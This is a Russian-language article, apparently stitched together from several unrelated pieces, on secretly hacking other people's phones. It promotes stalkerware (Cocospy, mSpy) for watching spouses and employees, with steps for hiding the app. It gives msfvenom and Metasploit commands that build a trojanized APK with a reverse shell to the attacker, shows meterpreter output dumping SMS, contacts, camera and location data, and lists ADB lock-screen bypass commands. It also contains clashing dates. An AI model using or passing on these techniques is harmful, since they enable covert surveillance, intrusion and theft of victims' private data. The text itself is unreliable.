Взлом телефона 2021: ТОП-10 программ взломать телефон самостоятельно

Cocospy – приложение N1 для взлома телефона

Cocospy дебютировал на рынке шпионского софта относительно недавно, но уже успел сделать себе имя, став приложением N1 для мониторинга телефонов.

Это абсолютно легальное и надежное ПО, завоевавшее доверие миллионов пользователей по всему миру.

Cocospy не требуется рутирование, поскольку доступ обеспечивается удаленно и напрямую с панели управления  iCloud. В случае с Android нужен физический доступ и инсталляция Cocospy на телефон. Но и тут “захват устройства” возможен без root-прав.

Через приложение вы можете контролировать активность в соцсети, а чтобы увидеть его в действии, протестируйте онлайн демо-версию Cocospy здесь >>

Сразу после установки на Android подчищаем следы, удаляя значок Cocospy. Приложение становится невидимым, но от этого не перестает делать свою работу “на отлично”. К тому же, чтобы не раскрыть себя, Cocospy не тянет энергию из батарей. Все! Android – ваш.

Программа для взлома VkurSe

Это самый надежный и проверенный временем способ осуществить взлом телефона. Программа VkurSe позволит быть в курсе всего, что делает человек на своем телефоне. Легальная, находится в свободном доступе. С сайта скачивается бесплатно, устанавливается бесплатно.

После взлома телефона Вы будете иметь:

Чтобы испытать данную программу на работоспособность и ознакомится с тем, как осуществляется взлом смартфона:

Программа Cocospy

Идеально подойдет тем, кто ищет, как взломать номер телефона без доступа к самому телефону. Это выход из положения, если никаким образом не удастся взять в руки телефон, а сам телефон является Айфоном. Но помните, если Вы хотите взломать Андроид, тогда установка программы на него обязательна.

Для удаленного взлома iPhone вам нужно:

1. Создать учетную запись на сайте
2. Узнать данные целевого Айфона
3. Авторизоваться в iCloud
4. Введите данные iPhone
5. После установки скройте значок программы

Итак, если нужно взломать Айфон без доступа, то эта программа как раз то, что Вам нужно. Надежная, проверенная, работающая, имеющая не такой огромный функционал как у VkurSe, но тоже вполне хороший.

Хакерская программа АндроРАТ

Эта программа позволит взломать телефон, зная номер телефона – т.е. подключиться к сервису можно с помощью простого СМС-сообщения или телефонного звонка. Это бесплатный взлом телефона. Установив прогу на телефон, Вы получаете удаленный доступ к телефону. После установки Вы сможете производить практически все действия от лица хозяина:

• звонить;
• отправлять тексты;
• делать снимки с камеры;
• открывать URL в браузере по умолчанию;
• собирать информацию об полученных сообщениях;
• отслеживать координаты на карте;
• и другое.

Поэтому, если Вам нужен взлом через СМС без доступа к телефону, тогда эта программа подойдет для Вас как нельзя лучше.

Динамический анализ от DroidBox

Одно из лучших приложений для взлома Android. Дает возможность увидеть все установленные программы на смартфоне. Также можно узнать буквально все о сетевом трафике. Кроме того Вы сможете получать СМС-сообщения и телефонные звонки. Возможно не в записи, а в развернутом детальном описании.

Это напрямую зависит от версии Андроида и марки телефона. Например, то, что можно увидеть на корейских аппаратах 2022 года выпуска, никаким образом не удастся увидеть на смартфонах китайского производства 2020 года. Поэтому нужно установить и проверить работоспособность конкретно на целевом телефоне.

Root и дамп памяти

Следующий шаг — снятие дампа внутренней памяти. Мы не можем быть уверены, что в телефоне не осталось никаких закладок, особенно если это фирменная прошивка от HTC и Samsung, поэтому перед включением сети лучше сохранить все его данные на нашем жестком диске. Иначе они могут быть удалены в результате удаленного дампа.

Для этого в обязательном порядке нужны права root (если, конечно, телефон еще не рутован). Как их получить, тема отдельной статьи, тем более что для каждого смартфона свои инструкции. Проще всего найти их на тематическом форуме и выполнить, подключив смартфон к компу по USB.

Когда root будет получен, просто копируем файлы на жесткий диск с помощью ADB. Нас интересуют только разделы /data и /sdcard, поэтому делаем так (инструкции для Linux):

$ adb root
$ adb pull /data
$ mkdir sdcard && cd sdcard
$ adb pull /sdcard

Все файлы будут получены в текущий каталог. При этом следует учесть, что если в смартфоне нет слота для SD-карты, то содержимое виртуальной карты памяти будет находиться в разделе /data и вторая команда просто не понадобится.

Что дальше делать с этими файлами, покажет только фантазия. В первую очередь следует обратить внимание на содержимое /data/data, там хранятся все приватные настройки всех установленных приложений (в том числе системных). Форматы хранения этих данных могут быть совершенно различны, но общей практикой считается хранение в традиционных для Android базах данных SQLite3. Обычно они располагаются по примерно таким путям:

/data/data/com.examble.bla-bla/setting.db

Найти их все можно с помощью команды find в Linux, запущенной в первоначальном каталоге:

$ find . -name *.db

Screen lock bypass для обхода пароля

Screen Lock Bypass Pro — специализированное приложение для сброса экрана блокировки и входа в операционную систему устройства.

Чтобы взломать пароль с помощью данного программного обеспечения необходимо, чтобы мобильное устройство было подключенное к интернету посредством беспроводной связи Wi-Fi.

Инструкция по установке и обходу пароля приложения Screen Lock Bypass Pro:

1. Заходим в аккаунт Google Play через интернет-браузер на персональном компьютере.
2. Находим в поиске Screen Lock Bypass Pro.
3. На странице установки нажимаем вкладку «Send to» (Или отправить).
4. Выбираем в открывшемся списке интересующий девайс.
5. Перезагружаем устройство.
6. В верхней части экрана появится загруженное устройство, нажимаем на значок.
7. В открывшемся окне программного обеспечения нажимаем на кнопку «Activate».
8. Создаём новый пароль для входа в систему.

Улита Screen Lock Bypass Pro работает только на операционной системе Android версии 4.1 и выше.

Данное приложение платное и обойдётся пользователю в 129 рублей.

Безопасность телефона и пароли

Безопасность телефона обеспечивают не только классические пароли и ПИН-кода, а также множество других служб в телефоне, в их числе:

• графический ключ;
• сканер отпечатков пальцев;
• FaceID.

Стандартный пароль представляет собой код из установленного пользователем количества знаков. В данном типе защиты могут присутствовать цифры, знаки препинания, служебные символы, а также латинские буквы.

Графический ключ — метод, в котором дисплей смартфона разделяется на несколько точек, а пользователь должен соединить их в правильном порядке, чтобы получить доступ к мобильному аппарату.

Сканер отпечатков пальцев присутствует практически на всех современных телефонах. Пользователь может выбрать любой из своих пальцев и приложить его к специально отведённому для этого месту. При каждом новом приложении мобильное устройство будет разблокировано.

FaceID — новейшая служба защиты смартфон от нежелательных пользователей. Работает данная функция при помощи специальной камеры, которая запоминает черты пользователя и предоставляет ему доступ к телефону, когда он посмотрит на дисплей.

Но, несмотря на всё многообразия служб защиты мобильного устройства, любой из этих способов можно обойти, если знать определённые методы того, как взломать телефон.

На просторе интернета можно найти несколько обучающих видеороликов по взлому экрана блокировки.

Взлом андроид смартфонов

Взлом андроид смартфонов – тема нашего обсуждения. Сегодня многие думают о том, чтобы взломать смартфон, удалённо прослушивать разговоры, просматривать смс-ки и самое интересное – смотреть через вебку. Взлом игр, приложений на андроид был доступен уже очень давно, чуть ли не с первых версий. Точнее сказать, тогда это было возможно, но не так популярно.

Начнём с того, что андроид является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве.

Мы уже публикавали статью, где рассказали о самых популярных приложениях для взлома и тестирования безопасности на андроид.

Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся.

Давайте разберемся, что нам для этого понадобится:

• Скрипт Evil-Droid;
• Открытый порт;
• ПК с установленным Kali Linux или загрузочная флешка.

Взлом андроид смартфонов – установка и запуск компонентов

Скачиваем архив или копируем его через терминал в необходимое место.

git clone ссылка на скрипт

Далее переходим в папку и даём права на исполнение файлу evil-droid

chmod  x evil-droid

Запускаем скрипт и генерируем вредоносный apk с бэкдором

sh evil-droid

Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт.

Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид.

Пункты, которые нам нужно настроить:

• ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети.
• set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать.
• Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления.
• Выбор папки, куда будет сгенерирован вредоносный apk.
• Генерация вредоносного apk.

Всё сделано. Для того, чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ.

Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список воспользуйтесь параметром –help или -h(идентичны).

Помните эти важные слова в наше время:

Ни одна система не является безопасной

Можете посмотреть галерею скриншотов для лучшего восприятия.

Восстановление через google аккаунт

При нескольких неудачных попытках ввести пароль или графический ключ и получить доступ к устройству, система заблокировать возможность процедуры на несколько минут. При продолжении ввода неправильных данных для входа время блокировки будет увеличиваться в геометрической прогрессии, пока система вовсе не запретить продолжать процесс входа с помощью введения пароля или графический ключа.

После этого пользователю даётся возможность восстановить доступ к своему мобильному устройство. Для восстановления необходимо ввести данные своего аккаунта в системе Google.

Смартфон должен быть подключен к беспроводной Wi-Fi сети или мобильному интернету, иначе восстановление описанным способом будет невозможно.

Пользователю необходимо войти в тот аккаунт, который он создавал или привязывал при первом запуске мобильного устройства. В случае если будут введены другие данные, система не сможет восстановить доступ к мобильному аппарату.

Выбираем приложение.

Перед тем, как начать, хакеру необходимо определиться с искомым приложением, которое он будет заражать для последующей «раздачи». Дело здесь не столько в популярности выбираемого, сколько в УЖЕ ИМЕЮЩИХСЯ возможностях и разрешениях этой программы. Давая разрешение на установку программы на свой смартфон, пользователи всё чаще обращают внимание именно на действия, которые приложение будет осуществлять.

Однако такое поведение очень даже характерно для другого рода утилит, в том числе системных. Речь идёт о всякого рода чистильщиках, ремонтных утилитах и, конечно, мобильных браузерах и мессенджерах. Скорее всего, хакер обратит свой взор именно в эту степь.

Я для примера возьму набирающий популярность мобильный браузер Mercury (у него есть дурацкая особенность – он сидит в автозагрузке и запускается вместе с включением устройства, а хакеру это только на руку), предварительно скачав его apk модуль установщика. Он называется ilegendsoft.mercury.apk.

Достойная альтернатива

Сейчас разработано достаточно много простых в применении шпионских программ, которых необходимо 1 раз установить на целевой телефон и больше не приближаться к нему. Установка таких софтов предельно легкая и незамысловатая, так как разработчики изначально нацелены на простых людей, не имеющих навыков программирования.

Программы для взлома телефона позволят:

1. Родителям видеть, где ходит их чадо после уроков, кому звонит и о чем говорит, кому пишет, какие сайты посещает, какие фото получает.
2. Ревнивым супругам узнать, говорит ли правду его вторая половинка и насколько соблюдена верность семейным узам.
3. Руководителям вести контроль над времяпровождением свои сотрудников во время рабочего дня.

Внимание! Другие способы взлома очень подробно описаны в статье «5 способов как взломать чужой аккаунт или телефон».

Как взломать смартфон: генерация пэйлоуда.

Главная команда, которая и создаст троянский код:

msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -x донор.apk -o заражённый.apk

-a dalvik — platform android – целью является платформа Андроид c архитектурой dalvik

Тип пэйлоуда. Обычно подбирается один из трёх типов пэйлоуда, которые по своему функционалу, в принципе, схожи. И все они входят в состав инструментария метерпретер из набора Метасплойт. Единственное их отличие — способ соединения с системой хакера. И выбирать будем из маленького списка:

IP адрес хакера. Если выбудете тренироваться на виртуальных площадках лаборатории, то есть смысл указать в качестве адреса локальный IP. У меня в статье будут фигурировать оба: локальный и глобальный адреса, так что вам лишь стоит набрать в Google команду what is my ip.

Как взломать смартфон: работа с троянским приложением.

Антивирус при установке молчит. Установка проходит незаметно, кроме, конечно, предупреждений о непонятно откуда взявшихся непомерных желаниях браузера. Жертва включает браузер и лезет в сеть.

В это время злоумышленник ждёт урожая. Заряжаем Метасплойт (порты в роутере проброшены?):

 use exploit/multi/handler

 set PAYLOAD android/meterpreter/reverse_tcp

 set LHOST 192.168.XXX.XXX

 set LPORT 1555

run

нажмите, чтобы увеличить

Запущена текущая сессия метерпретера. Теперь остаётся вспомнить или изучить основные команды метера и команды shell под Андроид. Что-то можно выудить прямо сейчас. Наберите в строке метерпретера:

help

и вы увидите быстрые команды. Что здесь есть:

Что хоть взломали-то такое:

sysinfo

Проверим список sms-сок:

meterpreter > dump_sms [*] Fetching 611 sms messages [*] SMS messages saved to: sms_dump_20220531121028.txt

Проверим список звонков ( на выходе вы увидите путь calllog_dump_20220531121133.txt – документ в папке root):

meterpreter > dump_calllog [*] Fetching 500 entries [*] Call log saved to calllog_dump_20220531121133.txt

Телефонные номера в книжке:

meterpreter > dump_contacts [*] Fetching 75 contacts into list [*] Contacts list saved to: contacts_dump_20220531122443.txt

Логи будут представлены в виде текстовых файлов:

Рутирован ли смартфон:

meterpreter > check_root [*] Device is not rooted

Сколько есть камер:

meterpreter > webcam_list 1: Back Camera 2: Front Camera

Фото на память (камеры можно выбирать):

meterpreter > webcam_snap [*] Starting... [ ] Got frame [*] Stopped Webcam shot saved to: /root/olutbmJh.jpeg

Запишем видео на память:

webcam_stream

На некоторых смартфонах пэйлоуд сам активирует геолокацию, у некоторых пользователей она всегда включена. Проверьте, где он сейчас находится – повезёт-не повезёт (один из моих заражённых смартфонов, работающих через Wi-Fi, определился с точностью до адреса дома):

wlan_geolocate

Наконец, для управления смартфоном наберём:

shell

Как скрытно и анонимно взломать чужой телефон на расстоянии?

1. Приобретите mSpy. Если вы готовы довольствоваться базовым набором опций или не хотите “добывать” root-права, покупайте пакет “Basic”. Чтобы получить доступ к расширенным функциям, придется приобретать пакет “Premium”.
2. Получив на свой email письмо со ссылкой, перейдите по ней на панель управления и выберите опцию «с джейлбрейк» или «без джейлбрейк».
3. «Без джейлбрейк». Введите Apple ID и пароль, чтобы проникнуть в чужой iPhone. В случае с Android нужен физический доступ для инсталляции mSpy  в нем.
4. «С джейлбрейк»: Следуя пошаговой инструкции, установите приложение на устройство. В случае затруднений воспользуйтесь услугами “mAssistance”.
5. Как только все будет готово, не забудьте скрыть значок mSpy.
6. Теперь перейдите на панель управления mSpy и начинайте мониторинг целевого устройства.

Посмотреть отзывы о mSpy  или попробовать  онлайн демо-версию здесь >>

Непреодолимая защита: сканирование радужки

Теперь поговорим о самом современном (и в теории — самом надёжном) способе аутентификации — сканировании радужки глаза. Радужная оболочка нашего глаза, как и отпечаток пальца, имеет свой неповторимый рисунок, подделать который пока невозможно. Такой же узор есть и на сетчатке, но повседневное использование сканера сетчатки было бы неудобным, так как его пришлось бы подносить вплотную к глазу для считывания изображения глазного дна.

Первым смартфоном со сканером радужки стал японский Fujitsu Arrows NX F-04G, выпущенный в 2022 году. С тех пор не так много гаджетов обзавелось данным технологичным датчиком. Одно из последних заметных появлений — в Samsung Galaxy Note 7. Во всех смартфонах в роли сканера выступает фронтальная камера.

Чтобы сканер исправно работал не только днём, но и ночью, к камере «прикручивают» инфракрасный излучатель. Нужен он ещё по двум причинам: во-первых, камере легче захватить радужку, подсвеченную ИК-светом, а во-вторых, инфракрасное излучение легко проходит через очки или линзы, что крайне актуально для слабовидящих людей.

На сегодняшний день сканер радужки является самым надёжным способом защитить данные в своём смартфоне от любого злоумышленника. В отличие от отпечатков пальцев, которые мы оставляем везде (в том числе на самом телефоне), рисунок радужки невозможно подделать.

Что ещё более важно в повседневной жизни, на разблокировку по радужке гораздо меньше влияют внешние факторы. Если сканер отпечатков не узнаёт грязные или мокрые пальцы, то уж радужку-то нам вряд ли удастся испачкать. Единственная угроза — дождь: капли воды могут не дать камере корректно считать рисунок.

Подглядывание пароля

Начнём с самых слабых в контексте защиты способов — PIN-кода и графического ключа. Не будем заострять внимание на программных уловках для взлома, вроде использования ADB и Recovery. И без них подсмотреть ключ достаточно просто.

Например, учёные из университетов Мюнхена и Штутгарта утверждают, что взломать телефон получится, сфотографировав его при помощи тепловизора. Устройство определит разницу температур на поверхности экрана и покажет, к какой его части прикасался владелец и какие цифры вводил.

Если вы считаете данный способ кражи ключа очередной сценой из бондианы, то загляните в любой магазин электроники. Купить тепловизор сегодня проще, чем получить статью за экстремизм. Есть даже миниатюрные камеры-тепловизоры для смартфонов, которые не вызовут никаких подозрений.

Для защиты от подобных атак рекомендуется после ввода ключа проводить ладонью по всему экрану, чтобы стереть или запутать тепловые следы. Также на стороне пользователя могут сыграть высокая яркость экрана и требовательные приложения, нагревающие процессор.

Ещё об одном незаурядном способе взлома графического ключа поведали британские учёные из университета Ланкастера. Они разработали алгоритм, который менее чем за пять попыток (а именно столько даётся пользователю до блокировки устройства) способен разгадать защитный узор. Для взлома злоумышленнику понадобится смартфон и специальное приложение.

Программа в реальном времени анализирует видео и вычисляет пароль. Самое главное, что камере не нужно видеть экран (это было бы глупо) — приложение следит за движением руки. Причём длинные и сложные комбинации графического ключа только облегчают задачу алгоритму — при увеличении числа компонентов остаётся меньше возможных вариантов.

В результате практических экспериментов выяснилось, что алгоритм способен разгадать с пяти попыток около 95% графических ключей. При этом 87% сложных паролей программа угадывает с первого раза, а вот лёгкие комбинации заставляют её ошибаться — только 40% удачных взломов.

Способов защиты от таких чудо-гаджетов несколько: либо прикрывайте руку, рисующую ключ, либо используйте сложный рукописный пароль (который, впрочем, можно подсмотреть тепловизором). Если вы думаете, что это слишком изощрённые способы кражи ключей, то вы ошибаетесь. Опытный хакер способен удалённо подключиться к фронтальной камере смартфона и считать пароль с отражения на зрачке.

Превентивные меры или как не попасться на удочку.

Из написанного понятны слабые места для тех, кто захочет вас отработать.

• приложение должно попасть на смартфон и установиться. А значит, есть смысл не оставлять его где попало без присмотра. Иначе любое ваше любимое приложение будет работать против вас же
• качаем приложения только из двух источников: разработчики и Google Play (там тоже много чего нехорошего замечено, но Google пытается контролировать ситуацию)
• читайте, что собирается делать устанавливаемое приложение. Если требований к доступу очень уж много, стоит отказаться. Бесплатный сыр, знаете ли… он такой.

Успехов вам.

РубрикаLinuxАндроид Как сделать виртуальный диск из смартфона Как показывать секунды в часах в трее?

Как взломать телефон на расстоянии? Судя по количеству писем, которыми нас забрасывают с недавних пор, этот вопрос волнует очень многих. Кому это нужно?

• Возможно, что родителям подростков. Как не волноваться, если у ребенка появились секреты и неизвестно что на уме. Удаленный мониторинг устройства был бы отличным решением.
• Не доверяющим друг другу супругам, один из которых подозревает свою вторую половину в обмане.
• Работодателям, которые считают, что работники используют рабочее время и предоставленный компанией телефон для личных нужд.

Конечно, интерес к взлому проявляют и другие. Но “любопытствующие” из вышеперечисленных 3-х групп  составляют значительное  большинство.

Прежде, чем бросаться в омут шоппинга, изучите рынок, убедитесь, что у выбранного вами софта безупречная репутация, это не контрафакт и ему можно довериться.

А чтобы не ошибиться и сделать правильный выбор, вооружитесь знаниями из этой статьи.

В ней мы поименно перечислим 6 лучших приложений для мониторинга устройства, чуть подробнее поговорим об их возможностях. И самое главное – мы покажем вам, как взламывать телефон на расстоянии.

С помощью сервиса от производителя смартфона

Сервисы от компаний производителей ещё одно доступное средство для обхода защиты на мобильном устройстве. Дело в том, что данное программное обеспечение используется для управления смартфоном на расстоянии, поэтому пользователь, даже не зная пароль на устройстве, может получить доступ к смартфону.

В качестве примера, можно привести сервис от компании-разработчика мобильных устройств Samsung, который называется Find My Mobile. Небольшой обзор на данное приложение:

Однако на данный момент это программное обеспечение интересует именно как возможность разблокировать экран, отменив все активные виды защиты мобильного аппарата.

Сделать это можно с официального сайта данного программного обеспечения компании Samsung.

Через режим recovery

Recovery — специализированный режим, который присутствует на всех мобильных устройствах, работающих на операционной системе Android. По сути, это системные настройки смартфона, о которых обычный пользователь знать не должен. В этом меню владелец мобильного аппарата может произвести сброс до заводских настроек. При выполнении этого процесса любой вид защиты аннулируется.

Чтобы произвести сброс устройства до заводских настроек необходимо сначала зайти в меню Recovery. Сделать это можно выключив телефон и зажав сочетание следующих клавиш на корпусе смартфона:

• кнопка блокировки и убавления громкости звука;
• кнопка блокировки телефона и увеличение громкости;
• клавиша выключения устройства и оба регулятора громкости;
• клавиша «Домой» и одна из кнопок изменения громкости звука.

Попав в меню Recovery необходимо найти вкладку «wipe data/factory reset». Затем, если пользователь подтвердит желание произвести процесс, произойдёт сброс настроек смартфона до заводских.

В случае необходимости нажать на пункт «reboot system now».

После окончания процедуры телефон перезагрузится обновлённый, без всех, подключенных ранее, видов пароля.

При возобновлении заводских настроек с помощью режима Recovery с хранилища памяти устройства будет удалены все личные данные пользователя.

Экран блокировки

Теперь, когда мы обезопасили свою персону, можно начать раскопки. Первое препятствие, которое нам придется обойти, — это экран блокировки. В 95% случаев он не будет иметь защиты, однако об остальных пяти процентах мы забывать не можем.

Защищенный экран блокировки в Android может быть трех основных типов. Это четырехзначный пин-код, графический ключ или снимок лица. На разблокировку первых двух дается в общей сложности двадцать попыток, разделенных по пять штук с «минутой отдыха» между ними.

Наша задача — попытаться обойти экран блокировки так, чтобы не скатиться к паролю Google, подобрать который уже точно не удастся. Самый простой способ это сделать — используя подключение по USB и ADB:

$ adb shell rm /data/system/gesture.key

Либо так:

$ adb shell
$ cd /data/data/com.android.providers.settings/databases
$ sqlite3 settings.db
> update system set value=0 where name='lock_pattern_autolock';
> update system set value=0 where name='lockscreen.lockedoutpermanently';
> .quit

Однако у этого метода есть две проблемы. Он требует прав root и не сработает в Android 4.3 и выше, так как для доступа к ADB нужно подтверждение со стороны устройства, что в условиях залоченного экрана сделать невозможно. Более того, доступ по ADB может быть отключен в настройках.

Мы можем спуститься на уровень ниже и для удаления файла с ключом блокировки использовать консоли восстановления. Для этого достаточно перезагрузиться в консоль восстановления (выключение включение с зажатой клавишей увеличения громкости) и прошить следующий файл.

Проблема этого подхода — зависимость от кастомной консоли восстановления. Стоковая консоль просто не примет файл как подписанный неверной цифровой подписью. Кроме того, в случае, если активировано шифрование данных, во время следующей загрузки телефон будет заблокирован и его спасет только полное удаление всех данных, что идет вразрез с нашей задачей.

Еще более низкий уровень — это fastboot, то есть манипуляция устройством на уровне загрузчика. Красота этого метода в том, что разблокированный загрузчик позволяет делать с устройством что угодно, включая загрузку и установку кастомной консоли восстановления.

$ fastboot devices

Теперь скачиваем «сырой» образ кастомной консоли восстановления (с расширением img) для «нашего» устройства и пытаемся его загрузить без установки:

$ fastboot boot cwm-recovery.img

Если загрузчик девайса разлочен, смартфон перезагрузится в консоль, через которую можно будет активировать режим ADB, залить с его помощью «обновление», ссылка на которое приведена выше, и прошить его. Далее достаточно будет перезагрузиться, чтобы получить полный доступ к смартфону. Кстати, если ты стал обладателем одного из Nexus-устройств, его загрузчик можно легко разблокировать вот так:

$ fastboot oem unlock

Но это просто информация к размышлению, так как операция разблокировки автоматически сбрасывает устройство до заводских настроек.

Теперь о том, что делать, если все эти способы не сработали. В этом случае можно попытаться найти баг в самом экране блокировки. Удивительно, но, несмотря на отсутствие таковых в чистом Android, они довольно часто находятся в экранах блокировок фирменных прошивок от производителя.

Например, в Galaxy Note 2 и Galaxy S 3 на базе Android 4.1.2 когда-то была найдена смешная ошибка, которая позволяла на короткое время получить доступ к рабочему столу, просто нажав кнопку «Экстренный вызов», затем кнопку ICE (слева внизу в номеронабирателе) и, наконец, кнопку «Домой». После этого буквально на полсекунды появлялся рабочий стол, чего вполне хватало, чтобы убрать блокировку.

Еще более тупой баг был найден в Xperia Z: можно было набрать на экстренном номеронабирателе код для входа в инженерное меню (##7378423##), с помощью него попасть в меню NFC Diag Test и далее выйти на рабочий стол тем же нажатием кнопки «Домой». Мне очень трудно представить, как могли появиться такие дикие баги, но они есть.

Что касается обхода графического ключа, тут все довольно просто. Он может быть отключен таким же способом, как и пин-код, но здесь есть еще две дополнительные возможности. Во-первых, даже несмотря на внушительное количество возможных вариантов ключей, люди в силу своей психологии чаще всего выбирают ключ, похожий на одну из букв латинского алфавита, то есть те самые Z, U, G, цифра 7 и так далее, что сводит количество возможностей к парам десятков.

Ну и последнее, о чем хотелось бы сказать, — это так называемый фейсконтроль. Это самый топорный вариант блокировки, который, с одной стороны, очень легко обойти, просто показав смартфону фотку владельца, но с другой — довольно трудно, так как, не зная даже имени владельца, раздобыть его фотографию не представляется возможным. Хотя попробовать сфоткать самого себя, конечно, стоит, вполне возможно, что ты похож на предыдущего владельца.

Заключение

Теперь вы знаете как взломать телефон на расстоянии. Лично я бы рекомендовал воспользоваться для этого надежным, вызывающим доверие и не требующим рутинга приложением Cocospy. С другой стороны, остальные шпионские ПО не менее эффективны.

В любом случае, последнее слово за вами. Мы надеемся, что благодаря этой статье вы поняли, как проводить удаленный мониторинг телефона. Если у вас есть какие-то вопросы, пожалуйста, пишите нам в комментариях.

Этот пост также доступен на других языках: English (Английский)Português (Португальский, Бразилия)日本語 (Японский)Español (Испанский)

Что делать, если забыл пароль от телефона? Как разблокировать андроид? Не стоит волноваться, существует несколько способов возобновить доступ к своему мобильному устройству. В этой статье можно найти основные варианты того, сбросить блокировку, как самые простые, так и более сложные, требующие дополнительных программ. Один из этих способов обязательно поможет решить проблему с заблокированным телефоном.